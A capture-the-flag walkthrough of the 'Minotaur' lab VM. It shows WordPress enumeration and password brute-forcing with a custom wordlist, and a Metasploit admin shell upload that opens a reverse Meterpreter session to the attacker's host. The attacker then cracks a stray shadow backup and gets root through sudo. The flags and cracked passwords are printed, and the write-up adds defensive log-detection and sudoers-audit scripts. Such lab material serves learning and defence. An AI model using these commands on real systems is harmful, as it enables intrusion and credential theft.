Minotaur is a boot2root CTF. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.
- This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
- One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
After spinning up the VM and doing an ARP scan, we find it at 192.168.56.223. A port scan shows 3 ports available:
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
There doesn’t appear to be anything within the FTP share, so let’s enumerate Apache a bit more. There don’t appear to be any custom comments or changes to the default page, so directory scanning is the next logical step.
# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --sc 200 http://192.168.56.223/FUZZ/
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://192.168.56.223/FUZZ/
Total requests: 3036
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00477:  C=200      321 L      862 W        16057 Ch       "bull"
Here, we find a ‘Bull Blog’, powered by WordPress.
wpscan is my de facto tool for scanning WordPress.
# wpscan -u http://192.168.56.223/bull/
This spits out 12 potential vulnerabilities, most of them XSS. The most promising-looking one is a Slideshow Gallery < 1.4.7 Arbitrary File Upload. However, we do need some valid credentials to use it.
wpscan can enumerate users for us, which is half the battle.
+----+-------+-------+
| Id | Login | Name  |
+----+-------+-------+
| 1  | bully | bully |
+----+-------+-------+
Now, this is where that second hint comes into play: a password we aren’t likely to find in an existing wordlist. I generated my own password list using john, a technique I learnt way back in Hell.
# cewl -m 5 -w bulls http://192.168.56.223/bull/
# wc -l bulls
315 bulls
# john --wordlist=bulls --rules --stdout >> bulls
# wc -l bulls
14590 bulls
That’s a lot of bulls :)
wpscan can also brute-force the password for us, which is nice as we don’t have to screw around with
# wpscan -u http://192.168.56.223/bull/ -w /root/minotaur/bulls --username bully --threads 50
[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:03:32 <======================================================================= > (13331 / 14591) 91.36%  ETA: 00:00:20
  [+] [SUCCESS] Login : bully Password : Bighornedbulls
I manually logged in just to make sure the credentials worked, and I also noted that this was an admin account (which was fairly predictable given its ID of 1). That means we don’t actually need to exploit the Slideshow Gallery vulnerability, as we can just upload a PHP shell via the admin panel.
I’ll just use the exploit/unix/webapp/wp_admin_shell_upload Metasploit module for this.
msf exploit(wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.101:4444
[*] Authenticating with WordPress using bully:Bighornedbulls...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /bull/wp-content/plugins/JthxXkaTsb/zQvuEhlHdT.php...
[*] Sending stage (33684 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.223:53478) at 2016-04-15 17:08:46 +0100
[+] Deleted zQvuEhlHdT.php
[+] Deleted JthxXkaTsb.php

meterpreter > sysinfo
Computer    : minotaur
OS          : Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686
Meterpreter : php/php
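From the defender's side, both web steps above (the wpscan password run against wp-login.php and the admin-panel plugin upload) leave a durable trace in Apache's access log even though the module deletes its files afterwards. This is an added example, not code from the original write-up; the log lines, the `WPScan` user agent, the source IPs and the `slideshow-gallery` inventory entry are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed Apache combined-format access log (not captured from the VM): a wpscan-style
# burst against wp-login.php, one ordinary login, then a plugin upload and a request to the
# uploaded PHP file, which has the same path shape the Metasploit module printed above.
SAMPLE_LOG = "\n".join(
    [f'192.168.56.101 - - [15/Apr/2016:17:01:{i:02d} +0100] "POST /bull/wp-login.php '
     f'HTTP/1.1" 200 3521 "-" "WPScan"' for i in range(6)]
    + ['192.168.56.50 - - [15/Apr/2016:17:03:10 +0100] "POST /bull/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
       '192.168.56.101 - - [15/Apr/2016:17:08:40 +0100] "POST /bull/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
       '192.168.56.101 - - [15/Apr/2016:17:08:46 +0100] "GET /bull/wp-content/plugins/JthxXkaTsb/zQvuEhlHdT.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
       '192.168.56.50 - - [15/Apr/2016:17:09:01 +0100] "GET /bull/wp-content/plugins/slideshow-gallery/css/style.css HTTP/1.1" 200 2210 "-" "Mozilla/5.0"'])
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse(log_text):
    """Yield (ip, timestamp, method, path, status) for every line that parses."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield m["ip"], ts, m["method"], m["path"], int(m["status"])

def login_bursts(events, window=60, threshold=5):
    """Source IPs with at least `threshold` POSTs to wp-login.php inside any `window` seconds."""
    posts = defaultdict(list)
    for ip, ts, method, path, _ in events:
        if method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            posts[ip].append(ts)
    flagged = set()
    for ip, times in posts.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window:
                flagged.add(ip)
                break
    return flagged

PLUGIN_PHP = re.compile(r"/wp-content/plugins/([^/]+)/.+\.php$")

def plugin_shell_candidates(events, known_plugins):
    """Plugin uploads, plus successful hits on PHP under a plugin directory not in the inventory."""
    hits = []
    for ip, ts, method, path, status in events:
        if method == "POST" and "action=upload-plugin" in path:
            hits.append((ip, ts, "plugin upload", path))
        m = PLUGIN_PHP.search(path.split("?")[0])
        if m and m.group(1) not in known_plugins and status == 200:
            hits.append((ip, ts, "php run from unknown plugin dir", path))
    return hits
```

The plugin inventory is whatever the site actually has installed; anything else answering 200 under wp-content/plugins/ is worth a look, regardless of whether the file still exists.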
The VM description told us that there are multiple flags, the first of which is found in the webroot.
meterpreter > cat /var/www/html/flag.txt
Oh, lookey here. A flag! Th15 15 @N [email protected] [email protected]!
The second flag is found in the /tmp directory, along with a priv-esc opportunity.
meterpreter > ls /tmp
100640/rw-r-----  121   fil  2015-05-27 03:47:45 +0100  flag.txt
100640/rw-r-----  1148  fil  2015-05-27 07:47:30 +0100  shadow.bak

meterpreter > cat /tmp/flag.txt
That shadow.bak file is probably useful, hey? Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h [email protected]|)
meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak
I extracted the hashes from shadow.bak and ran them through john, and got one hit pretty quickly: h0rnbag. I was able to use these creds to log in over SSH as heffer and retrieve his flag.
# ssh heffer@192.168.56.223
heffer@minotaur:~$ ls -l
-rw------- 1 heffer heffer 107 May 27  2015 flag.txt
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 [email protected] 15: m00000 y0
This user has a sudo entry, but it doesn’t seem to work: the script it points to, /root/bullquote.sh, doesn’t exist.
heffer@minotaur:~$ sudo -l
User heffer may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
heffer@minotaur:~$ sudo /root/bullquote.sh
[sudo] password for heffer:
sudo: /root/bullquote.sh: command not found
While I was poking around here, john gave me a second password: obiwan6 (minotaur). I did a quick su and collected the flag.
heffer@minotaur:~$ su minotaur
Password:
minotaur@minotaur:/home/heffer$ cd
minotaur@minotaur:~$ ls -l
-rw------- 1 minotaur minotaur  107 May 27  2015 flag.txt
drwxr-xr-x 4 minotaur minotaur 4096 May 27  2015 peda
minotaur@minotaur:~$ cat flag.txt
Congrats! You've found the first flag: M355 W17H T3H 8ULL, G37 73H H0RN!
But can you get /root/flag.txt ?
minotaur is able to run ALL as root, which makes elevation to root nice and easy.
minotaur@minotaur:~$ sudo -l
User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
minotaur@minotaur:~$ sudo -i
[sudo] password for minotaur:
root@minotaur:~#
root@minotaur:~# ls -l
-rw------- 1 root root   70 May 27  2015 flag.txt
drwxr-xr-x 4 root root 4096 May 27  2015 peda
-rwx------ 1 root root  845 May 15  2015 quotes.txt
root@minotaur:~# cat flag.txt
Congrats! You got the final flag!
Th3 [email protected] is: 5urr0nd3d bY @r$3h0l35
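Two of the things that made the last hops trivial, a group-readable shadow.bak left in /tmp and sudo rules that either grant ALL or point at a script that does not exist, are cheap to audit on a box you defend. This added example is mine, not the author's: the sudoers lines are constructed from the two sudo -l outputs above, the temp directory stands in for /tmp, and the `exists` parameter is a hypothetical hook so the path check can be exercised offline.

```python
import os
import re
import tempfile
# Constructed sudoers lines mirroring the two `sudo -l` outputs above (not the VM's own file).
SUDOERS_SAMPLE = """\
root     ALL=(ALL:ALL) ALL
heffer   ALL=(root) NOPASSWD: /root/bullquote.sh
minotaur ALL=(root) NOPASSWD: /root/bullquote.sh
minotaur ALL=(ALL:ALL) ALL
"""
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudoers(text, exists=os.path.exists):  # `exists`: hypothetical hook for offline tests
    """(user, reason, cmd) findings: a non-root user granted ALL, or a NOPASSWD command missing on disk."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#")[0].strip()
        m = SPEC_RE.match(line) if line else None
        if not m or m["user"] == "root":
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd == "ALL":
                findings.append((m["user"], "unrestricted sudo", cmd))
            elif nopasswd and not exists(cmd.split()[0]):
                findings.append((m["user"], "NOPASSWD target missing", cmd))
    return findings

def stray_shadow_copies(directory):
    """Password-database copies outside /etc that a non-root user could read (owner or mode)."""
    hits = []
    for name in sorted(os.listdir(directory)):
        if not re.match(r"(g?shadow|passwd)", name):
            continue
        path = os.path.join(directory, name)
        st = os.stat(path)
        if st.st_uid != 0 or st.st_mode & 0o044:   # group- or world-readable
            hits.append((path, oct(st.st_mode & 0o777), st.st_uid))
    return hits

def demo_dir():
    """Constructed stand-in for the VM's /tmp: a group-readable shadow.bak beside a harmless file."""
    d = tempfile.mkdtemp()
    for name, mode in (("shadow.bak", 0o640), ("notes.txt", 0o600)):
        path = os.path.join(d, name)
        with open(path, "w") as f:
            f.write("constructed sample, no real hashes\n")
        os.chmod(path, mode)
    return d
```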